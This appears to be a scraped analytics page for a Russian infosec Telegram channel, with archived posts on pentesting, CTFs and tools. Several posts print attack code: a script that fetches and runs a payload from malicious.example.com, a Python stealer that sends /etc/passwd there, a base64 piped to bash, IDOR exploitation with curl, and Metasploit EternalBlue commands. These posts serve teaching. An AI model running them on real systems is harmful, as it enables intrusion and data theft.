ru
Feedback
CodeGuard: PySec Edition

CodeGuard: PySec Edition

Закрытый канал

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

Больше

📈 Аналитический обзор Telegram-канала CodeGuard: PySec Edition

Канал CodeGuard: PySec Edition является активным участником. Сейчас сообщество объединяет 14 180 подписчиков, занимая 8 724 место в категории Технологии и приложения и 45 616 место в регионе Россия.

📊 Показатели аудитории и динамика

С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 14 180 подписчиков.

Согласно последним данным от 29 сентября, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 873, а за последние 24 часа — 56, при этом общий охват остаётся высоким.

  • Статус верификации: Не верифицирован
  • Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 9.97%. В первые 24 часа после публикации контент обычно набирает 5.53% реакций от общего числа подписчиков.
  • Охват публикаций: В среднем каждый пост получает 1 413 просмотров. В течение первых суток публикация набирает 784 просмотров.
  • Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 6.
  • Тематические интересы: Контент сосредоточен на ключевых темах, таких как codeguard, pysec, docker, grep, контейнер.

📝 Описание и контентная политика

Автор описывает ресурс как площадку для выражения субъективного мнения:
“Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”

Благодаря высокой частоте обновлений (последние данные получены 30 сентября, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.

14 180
Подписчики
+5624 часа
+1687 дней
+87330 дней
Архив постов
⚡️ RECURA — один из лучших каналов для разработчиков и программистов. Канал ведёт практикующий DevOps-инженер, который ежедне
⚡️ RECURA — один из лучших каналов для разработчиков и программистов. Канал ведёт практикующий DevOps-инженер, который ежедневно публикует: 🔹код, повышающий эффективность разработки 🔹лайфхаки и полезные трюки для Bash и Linux 🔹готовые решения для Docker и Kubernetes 🔹инструменты и утилиты для автоматизации 🔹полезные материалы и советы по информационной безопасности ⚠️ Подпишись, чтобы быть востребованным специалистом.

🆒 CodeGuard — это не просто один канал, а целая сеть полезных проектов для вас! Актуальные ресурсы ниже:
PySec Edition Материалы по кибербезу. Linux Не для всех, но именно для тебя. SciencePop Научно-популярный журнал для инженеров и разработчиков Vacancy IT Вакансии, фриланс и топовые подборки Chat CodeGuard Сообщество единомышленников, пообщаться и спросить. Archive Шпоры, книги и материалы для обучения. @N3tHunterLab Ламповый канал про ИБ и все что с ним связано.
Спасибо, что вы здесь — вместе мы сильнее!

🔍 Как найти и использовать уязвимость в публичном API Публичные API — это интерфейсы, через которые приложения общаются друг с другом. Иногда в них бывают ошибки, которые позволяют злоумышленникам получить доступ к данным или изменить их. Расскажу, как проверить API и найти такие уязвимости. ⚙️ Шаг 1. Узнаём, как работает API API — это набор адресов (endpoint), куда отправляются запросы. Например:
https://api.example.com/users/123
где 123 — это ID пользователя. Используем программу Postman или просто команду curl, чтобы посмотреть, что вернёт сервер:
curl https://api.example.com/users/123 -H "Authorization: Bearer токен_доступа"
Если нет токена, попробуй запросить без него — иногда API плохо проверяет права. ➡️ Шаг 2. Проверяем уязвимость — можно ли получить чужие данные? Попробуй подставить другой ID пользователя:
curl https://api.example.com/users/124 -H "Authorization: Bearer твой_токен"
Если API вернёт данные пользователя 124, хотя ты должен видеть только свои, значит тут уязвимость — её называют IDOR (Insecure Direct Object Reference). ➡️Шаг 3. Что можно сделать, если уязвимость есть? Можно читать чужие данные, а иногда — менять их. Например, изменить email:
curl -X PUT https://api.example.com/users/124 \
     -H "Authorization: Bearer твой_токен" \
     -H "Content-Type: application/json" \
     -d '{"email":"hacker@example.com"}'
Если это сработало — значит API не проверяет права правильно, и это опасно. ➡️Шаг 4. Немного автоматизации с Python Можно быстро проверить, доступен ли чужой аккаунт, заменяя ID:
import requests

url = "https://api.example.com/users/"
token = "твой_токен"
headers = {"Authorization": f"Bearer {token}"}

for user_id in range(120, 130):
    r = requests.get(url + str(user_id), headers=headers)
    if r.status_code == 200:
        print(f"Данные пользователя {user_id} доступны!")
Главное: Проверяй только то, что разрешено, иначе это незаконно. 😈 CodeGuard | #API #pentest #curl #python #vulnerability

⚠️ [Перевод] SSL-сертификаты в 2025: самый прибыльный развод в истории интернета $199 за файл. Не за программу. Не за базу да
⚠️ [Перевод] SSL-сертификаты в 2025: самый прибыльный развод в истории интернета $199 за файл. Не за программу. Не за базу данных. Даже не за документ с полезной информацией. За файл в несколько килобайт зашифрованного текста, который говорит браузеру «этот сайт действительно тот, за кого себя выдает». В 2005 году именно столько стоил SSL‑сертификат от VeriSign. Каждый год. За каждый домен. Без исключений. Сегодня точно такую же безопасность, идентичное шифрование, то же доверие браузеров, ту же защиту — можно получить бесплатно. Установить за 30 секунд, так еще и продлевать автоматически. Но вот, в чем мем: хостинг‑компании до сих пор берут $50, $100, а то и $200 за «премиальные» SSL‑сертификаты, которые работают абсолютно так же, как бесплатные. Как целая индустрия продолжает драть деньги за то, что стало товаром широкого потребления и полностью автоматизировано?
Добро пожаловать в историю самого прибыльного развода в истории интернета. Развода настолько элегантного, так хорошо прорекламированного и так глубоко укоренившегося в хостинг‑индустрии, что он продолжает печатать деньги даже после того, как все знают, что это развод.
➡️ Продолжение тут 😈 CodeGuard | #cybersecurity

💻OWASP Juice Shop — идеальная площадка для практики пентеста OWASP Juice Shop — это уязвимое веб-приложение, специально созд
💻OWASP Juice Shop — идеальная площадка для практики пентеста OWASP Juice Shop — это уязвимое веб-приложение, специально созданное для обучения и прокачки навыков безопасности. 🌐 Внутри — целый набор проблем разной сложности, которые нужно найти и успешно использовать для эксплуатации. Так что это не просто учебник, а настоящий вызов! 🔥Это отличный старт, если хотите понять, как искать и использовать уязвимости в веб-приложениях. Можно тренироваться в безопасной среде, участвовать в CTF и проверять свои инструменты.
📌Почему OWASP Juice Shop? - Покрывает все основные уязвимости из списка OWASP Top 10 - Современный стек: Node.js, Express, Angular, что приближает его к реальному вебу - Подходит как новичкам, так и профи для практики и экспериментов - Отслеживание прогресса через баллы — геймификация помогает идти дальше
Изучать веб-безопасность и пентест — попробуй Juice Shop! 😈 CodeGuard | #pentest #infosec #owasp #websecurity #ctf

Будете участвовать? Призы будут)
Anonymous voting

👨‍💻 Хотите поучаствовать в CTF? Голосуйте! Планируем запустить собственный сервер с CTF-соревнованием — с интересными задач
👨‍💻 Хотите поучаствовать в CTF? Голосуйте! Планируем запустить собственный сервер с CTF-соревнованием — с интересными задачами и реальными призами! Хотите попробовать свои силы, прокачать навыки и посоревноваться с другими? 🔹 Оставьте лайк или коммент ниже, если готовы участвовать. Будет классно, если удастся организовать регулярные турниры с наградами. Готовы? Давайте посмотрим, сколько нас соберётся! Делитесь, чтобы собрать команду друзей! 😈 CodeGuard | #ctf #соревнования

🔥 Деконструкция вредоносного ПО: что скрывается за базовыми скриптами Многие думают, что «вредоносное ПО — это что-то сложное». На самом деле, масса атакующих скриптов написаны на Bash или Python и выглядят просто(имхо). Но за простотой скрывается продуманная логика и опасные техники. Разберём базовые примеры. 👩‍💻 1. Вредоносный Bash-скрипт: распространение и запуск команд Пример простого скрипта, который скачивает и запускает вредоносный файл:
#!/bin/bash
# Скачиваем вредоносный файл и запускаем
curl -s http://malicious.example.com/malware.sh -o /tmp/malware.sh
chmod +x /tmp/malware.sh
/tmp/malware.sh &
-- Используется curl для загрузки файла с C&C сервера — Запуск выполняется в фоне — скрытно для пользователя — Вредоносный payload может быть любым — удалённое выполнение команд, майнинг, шпионаж 👩‍💻 2. Python-скрипт для сбора и отправки данных Пример кода на Python, который читает локальный файл с паролями и отправляет на удалённый сервер:
import requests

def steal_data():
    with open('/etc/passwd', 'r') as file:
        data = file.read()
    url = 'http://malicious.example.com/collect'
    requests.post(url, data={'content': data})

if __name__ == "__main__":
    steal_data()
- Используется модуль requests для HTTP-запроса - Чтение системного файла /etc/passwd — могут быть и конфиги, и ключи - Все данные отправляются на фишинговый или контролируемый сервер 🤔 3. Техники маскировки и обхода - Скрипты часто запускаются из cron или через systemd для постоянства - Логи и консольный вывод отключают или направляют в /dev/null - Используются переменные среды и шифрование для сокрытия URL и команд 📖 4. Как анализировать такие скрипты — Покомандно и построчно читать код — понимать что делает каждая строка — Использовать bash -x script.sh или добавлять print() в Python для отладки — Запускать в песочнице (VM) под контролем системы мониторинга — Перехватывать сетевой трафик с помощью tcpdump или Wireshark 👩‍💻 5. Мини-скрипт для распаковки закодированных строк в Bash Иногда payload шифруют base64:
echo "Y3VybCAtcyBodHRwOi8vbWFsaWNpb3VzLmV4YW1wbGUuY29tL21hbHdhcmUuc2g=" | base64 -d | bash
Для анализа достаточно выполнить декодировку:
echo "строка_в_base64" | base64 -d
👩‍💻 6. Пример Python скрипта для запуска шелл-команд и сбора вывода
import subprocess

cmd = "uname -a"
result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)
print(result.stdout.decode())
Эта техника часто используется для сбора информации о системе. Простые на вид скрипты — это часто высокоэффективные инструменты атак. Важно уметь их читать, распаковывать и анализировать логику. Постоянная практика и инструменты помогут выявлять угрозы. ⭐️ CodeGuard | #malware #bash #python #pentest #reverseengineering

🌃 Инструментарий: GoSearch — поиск по нику на 300+ сайтах Ищешь быстрый и удобный способ найти аккаунты человека или проверить компрометации? Тогда GoSearch — топовый выбор! 🚀 Работает значительно быстрее аналогов типа Sherlock благодаря многопоточности. ⚙️ Главное: умеет проверять утечки через API HudsonRock, ProxyNova и BreachDirectory — это значит, что вы получите не только файндинг аккаунтов, но и инфу о возможных утечках данных. 📱Репозиторий на GitHub: https://github.com/ibnaleem/gosearch Ставь 👍, если хочешь больше топовых инструментов для быстрого и эффективного сбора инфы! 😈 CodeGuard | #osint #pentesting

🌍 Дашборды для OSINT и глобального мониторинга Если нравится наблюдать за изменениями в мире в масштабах континентов и стран
🌍 Дашборды для OSINT и глобального мониторинга Если нравится наблюдать за изменениями в мире в масштабах континентов и стран, эта подборка дашбордов для вас. Отличный источник данных и вдохновения для OSINT-аналитиков! 1. Shadowserver dashboard Команда Shadowserver отслеживает DDoS, ботнеты, сканирование портов и CVE-уязвимости. Ежедневно обновляемая статистика на интуитивных картах. 2. Shodan internet exposure dashboard Открытые базы, АСУ ТП, торчащие наружу порты с разбивкой по регионам. 3. Global ransomware attacks Карта по атакам программ-вымогателей с 2018 года: сектора экономики, типы программ и суммы выкупа. 4. cybermap.kaspersky Красочный глобус от Лаборатории Касперского с актуальной статистикой угроз. 5. Live Threat Map Сводка кибератак за последний час, сутки и месяц, с топами по странам и типам атак. 6. Talos reputation center Комплексная панель киберугроз от Cisco Talos. 7. Cyber Attack Map Топ серверов-распространителей спама и вредоносного ПО. 8. Sicherheitstacho Сервис от Deutsche Telekom на базе опенсорс ханипотов T-Pot. 9. Cyber map от HTTPCS Агрегация угроз по странам, с расширенной статистикой (требуется регистрация). Эти дашборды не только красивы, но и позволяют быть в курсе динамики киберугроз в мире. 😈 CodeGuard | #osint #cybersecurity #threatmonitoring

🔥 Как читать и анализировать эксплоиты к уязвимостям: первые шаги Эксплоит — это код, который использует баг в программе для получения несанкционированного доступа или другой атаки. Чтобы понять и изучить эксплоиты, важно пошагово подходить к их анализу. ✅1. Изучи уязвимость и её описание (CVE и контекст) Перед организацией анализа скачай описание уязвимости: на сайте [Exploit-DB], [NVD] или в Metasploit. Пойми, как устроена ошибка и где она появляется. ✅2. Зацени код эксплоита Обычно он написан на Python, Bash, Ruby, C или PowerShell. Раздели код на части: - Подготовка окружения - Точки входа (например, функция, куда подаются данные) - Основной функционал атаки — какая команда выполняется, что изменяется. ✅3. Запусти безопасную тестовую среду - Используй виртуальную машину (VirtualBox, VMware) - Установи уязвимую версию софта - Отключи сеть (по необходимости) или используи изолированную сеть ✅4. Проверь зависимости и права Если эксплоит использует внешние библиотеки или команды, убедись, что всё установлено (или установи):
pip install -r requirements.txt
или
sudo apt-get install <пакет>
✅5. Запусти эксплоит с ключами отладки Добавляй команды вывода для отслеживания: - Для Bash: поставь set -x в начале скрипта - Для Python добавь print() для важных переменных - И запускай из терминала:
python3 exploit.py --target 192.168.0.10
✅6. Анализируй сетевой трафик Во время запуска эксплоита захватывай трафик с помощью tcpdump или наблюдай через Wireshark:
sudo tcpdump -i eth0 -w exploit_traffic.pcap
wireshark exploit_traffic.pcap
✅7. Мини-пример на Python для теста уязвимости (Buffer Overflow)
import socket

target_ip = "192.168.0.10"
target_port = 9999

payload = b"A" * 1024  # заполняем буфер для взлома

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(payload)
print("Payload отправлен!")
s.close()
Этот скрипт посылает 1024 символа ‘A’ на указанный порт — простой тест на переполнение буфера или отслеживание реакции сервера. ✅ 8. Используй Exploit-DB и Metasploit - Для поиска эксплоитов:
searchsploit <название_уязвимости>
- Запуск Metasploit:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.10
run
⚠️ Важное: обязательно анализируй эксплоиты в изолированной и контрольной среде во избежание вреда. Эти навыки — основа в тестировании безопасности. тебе еще весело? или слишком много надо понимать? желание быть хакером пропадает?)) а это только первые шаги...) ⭐️ CodeGuard | #pentest #exploit #bugbounty #cve

📀 Goffeeйнная гуща: актуальные инструменты и особенности группировки GOFFEE в атаках на Россию В течение 2024 года несколько
📀 Goffeeйнная гуща: актуальные инструменты и особенности группировки GOFFEE в атаках на Россию В течение 2024 года несколько российских организаций обращались к команде по реагированию на киберинциденты экспертного центра Positive Technologies (PT ESC IR) для расследования инцидентов, между которыми удалось обнаружить сходство. В рамках анализа вредоносная активность инцидентов была объединена в один кластер и связана с группой Goffee, атакующей российские организации с помощью фишинга с 2022 года. В этой статье мы расскажем про вредоносное ПО, которое используют злоумышленники в атаках, в том числе речь пойдет о ранее неизвестном рутките под Linux, который был замечен в одном из инцидентов. 😎 Можно глянуть позже 😈 CodeGuard | #linux

🤔 Книга: «Сети глазами хакера» Автор: Базаров М. М. Год: 2025
Если интересуешься сетевой безопасностью и хочешь понять, как устроены сети с точки зрения хакера, эта книга — отличный выбор. 👩‍💻 Что внутри: - Практические рекомендации по пентесту сетей Cisco - Разбор протокола DTP от Cisco Systems - Подробный гайд по тестированию канального уровня сети и безопасности MikroTik - Методики пентестов с минимальным ущербом инфраструктуре - Советы по использованию Kali Linux для эффективного тестирования - Использование виртуальных машин для постэксплуатации - Рекомендации по защите сетей от атак - Примеры техник как для хакеров, так и для защитников 💠 Рекомендуется всем, кто хочет глубже понять внутреннее устройство сетей и методы их проверки безопасности! 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #pentest #networksecurity

Repost from Arakcheev
🚀 Хочешь прокачать навыки кибербеза и Linux? Попробуй себя в CTF с игрой Bandit от OverTheWire. Это пошаговая игра с уровнями — от 0 и дальше, где каждая задача учит практическим навыкам работы с командной строкой, SSH, файлами и разрешениями. Отличный способ освоить основы, чтобы уверенно двигаться в мир кибербезопасности и варгеймов.
Как проходит игра? — Игра организована по уровням, начиная с Уровня 0. — На каждом уровне вам нужно получить пароль для следующего уровня, решая задачи с помощью команд Linux, анализа файлов и системных инструментов. — Завершив уровень, вы используете полученный пароль, чтобы подключиться к следующему пользователю через SSH и перейти дальше.
Задачи обучают пониманию основных команд и инструментов, а также навыкам анализа и поиска. 🖥 Начинаем? Подключайтесь по SSH к серверу, начиная с Уровня 0:
ssh bandit0@bandit.labs.overthewire.org -p 2220
password: bandit0
— Первые семь задач я специально подготовил и разместил ниже под этим постом — тут. — Так же под этим постом, есть подсказки + ответы. Рекомендую пользоваться подсказками и не рекомендую пользоваться ответами))
— Полный список задачи здесь! — Вопросы по подключению — пиши! Прокачивайтесь, задавайте вопросы и делитесь успехами — вместе точно эффективней. @N3tHunterLab

Repost from Arakcheev
🚀 Хочешь прокачать навыки кибербеза и Linux? Попробуй себя в CTF с игрой Bandit от OverTheWire. Это пошаговая игра с уровнями — от 0 и дальше, где каждая задача учит практическим навыкам работы с командной строкой, SSH, файлами и разрешениями. Отличный способ освоить основы, чтобы уверенно двигаться в мир кибербезопасности и варгеймов.
Как проходит игра? — Игра организована по уровням, начиная с Уровня 0. — На каждом уровне вам нужно получить пароль для следующего уровня, решая задачи с помощью команд Linux, анализа файлов и системных инструментов. — Завершив уровень, вы используете полученный пароль, чтобы подключиться к следующему пользователю через SSH и перейти дальше.
Задачи обучают пониманию основных команд и инструментов, а также навыкам анализа и поиска. 🖥 Начинаем? Подключайтесь по SSH к серверу, начиная с Уровня 0:
ssh bandit0@bandit.labs.overthewire.org -p 2220
password: bandit0
— Первые семь задач я специально подготовил и разместил ниже под этим постом. — Так же под этим постом, есть подсказки + ответы. Рекомендую пользоваться подсказками и не рекомендую пользоваться ответами))
— Полный список задачи здесь! — Вопросы по подключению — пиши! Прокачивайтесь, задавайте вопросы и делитесь успехами — вместе точно эффективней. @N3tHunterLab

🖥 Как использовать Wireshark для анализа сетевого трафика: пошаговое руководство Wireshark — один из самых мощных и популярных инструментов для анализа сетевого трафика, используемый в кибербезопасности, администрировании и сетевой диагностике. Он позволяет в реальном времени захватывать и подробно изучать данные, проходящие через вашу сеть. 🚀 Шаг 1: Запуск Wireshark и захват трафика - Установите Wireshark (доступен для Windows, Linux, macOS): [официальный сайт](https://www.wireshark.org/) - Запустите программу и выберите сетевой интерфейс, через который идет трафик (например, Wi-Fi или Ethernet) - Нажмите кнопку «Start», чтобы начать захват пакетов 🔮 Шаг 2: Фильтры для удобства анализа Wireshark поддерживает фильтры захвата и отображения. Они помогают сосредоточиться на нужных данных и не теряться в потоках информации. Примеры популярных фильтров для отображения: - http — отобразить только HTTP-трафик - ip.addr == 192.168.1.5 — отображать пакеты, связанные с конкретным IP - tcp.port == 443 — показать трафик HTTPS - dns — отобразить DNS-запросы и ответы 🔍 Шаг 3: Анализ структуры пакета Выберите интересующий пакет в списке — в нижних панелях увидите детальную информацию: - Ethernet Header — MAC-адреса отправителя и получателя - IP Header — IP-адреса источника и назначения - TCP/UDP Header — порты и параметры соединения - Application Layer — данные, например, HTTP-запросы и ответы 💾 Шаг 4: Сохранение и экспорт данных Захваченные данные можно сохранить в файл для последующего анализа: File → Save As → выберите формат (например, .pcapng) и место хранения 🛡Пример практического использования: - Отследите подозрительный IP, используя фильтр: ip.addr == <адрес> - Анализируйте содержимое HTTP-запросов, чтобы выявить уязвимости и аномалии ⚠️ Помните: использование Wireshark должно соответствовать правилам и этике — перехват сетевого трафика без разрешения владельцев может быть незаконным. ✔️ Полезные ссылки и гайды: - Подробное руководство на Хабре: [Основы работы с Wireshark] - Видеообзор и пошаговая установка: [YouTube] Андрей Must have - Руководство от Timeweb: [Как анализировать трафик через Wireshark] Ставь 👍, тебе не сложно - мне мотивация пилить посты 😈 CodeGuard | #Wireshark #NetworkAnalysis #SysAdmin

💻 Шпаргалка по защите сервера от хакеров и другой нечисти Когда сервер создаётся для личных нужд — часто про безопасность забывают. А это очень опасно! Даже если это игровой сервер или хранилище, через 15 минут после появления публичного IP он попадает под автоматическое сканирование и атаки ботнетов. Вот проверенный набор советов, чтобы защитить сервер от взлома и несанкционированного доступа:
✅Защита — nоn fiсtion; ✅Намудрите сложные пароли; ✅Используйте fail2ban; ✅Включите подключение по SSH; ✅Забудьте про root; ✅Используете безопасные протоколы; ✅Актуализируйте версии ОС и ПО; ✅Процедите порты; ✅Подключите двухфакторку; ✅Защитите сервер от DDoS; ✅Логируйте и мониторьте; ✅Выводы.
Эти простые шаги могут обезопасить сервер даже от большинства автоматических сканеров и ботов. 🔐 Безопасность — не на уровне «посмотрю по фигу», а на уровне «делаю правильно». 😈 CodeGuard | #security #sysadmin

⚡️ Как перехватывать Wi-Fi трафик с Kali Linux: быстрый гайд Кратко расскажу как мониторить Wi-Fi трафик и видеть, что происходит в радиусе действия, Kali Linux и несколько простых команд, которые тебе помогут. ✔️ 1. Переводим Wi-Fi адаптер в режим мониторинга
sudo airmon-ng check kill  
sudo airmon-ng start wlan0  
Это отключит службы, мешающие работе, и включит мониторинг на интерфейсе wlan0mon. ✔️ 2. Смотрим доступные сети и клиентов
sudo airodump-ng wlan0mon  
На экране появится список сетей, их каналов, MAC-адресов и активных клиентов. ✔️ 3. Сохраняем трафик с конкретной точки доступа
sudo airodump-ng --bssid <MAC_точи_доступа> -c <канал> -w capture wlan0mon  
Заменяем <MAC_точи_доступа> и <канал> на данные из предыдущего шага, чтобы сфокусироваться на нужной сети. ✔️ 4. Перехватываем трафик с tcpdump
sudo tcpdump -i wlan0mon -w traffic.pcap  
Запишет весь трафик в файл для последующего анализа. ✔️ 5. Анализируем в Wireshark
wireshark traffic.pcap  
Открываем файл, фильтруем HTTP, DNS или другие протоколы, ищем интересные данные. Этот пошаговый гайд — отличный старт для понимания сниффинга и мониторинга. Никакой магии, только команды и инструменты. расскажи другу и поставь 👍 ⭐️ CodeGuard | #pentest #kali #wifi

+3
💥 Взлом для начинающих [Часть 1] Это емкий курс — именно то, что нужно новичкам, чтобы получить базовое понимание хакинга и пройти первые шаги. 🔹Что внутри: 📍 Интернет и IP-адреса — что к чему 📍 NAT и преобразование сетевых адресов 📍 Как работает система доменных имён (DNS) 📍 Серверы, сервисы и порты — основы 📍 Понимание пакетов и протоколов 📍 Что такое 4 ключевых компонента для взлома 📍 Как находить уязвимости и использовать их 📍 Получать полный контроль над целью ⚠️ Правда: курс поверхностный — он лишь открывает дверь в мир взлома. Тем, у кого уже есть опыт с сетями и вебом будет легко. p.s вторая часть будет в след пятницу) Для новичков же — отличный старт, чтобы понять логику, почувствовать процесс и решиться двигаться дальше. 🥡 Полная Часть 1 в Архиве — последний пост ⭐️ CodeGuard | Chat | #pentest #kali #course

⚠️ Ребята, увидел пост у @N3tHunterLab — компания F6 проводит крутой CTF! Не упустите шанс проверить свои навыки по реверс-ин
⚠️ Ребята, увидел пост у @N3tHunterLab — компания F6 проводит крутой CTF! Не упустите шанс проверить свои навыки по реверс-инжинирингу и решить реальную головоломку — на кону классный мерч от F6! Напомню, это не просто учебное задание, а реальная история: специалисты F6 помогли детскому саду расшифровать файлы после атаки вымогателя, и теперь предлагают вам повторить этот опыт. ⚠️ Осталось совсем немного времени — победителей объявят 15 сентября. 🗣 Подробнее тут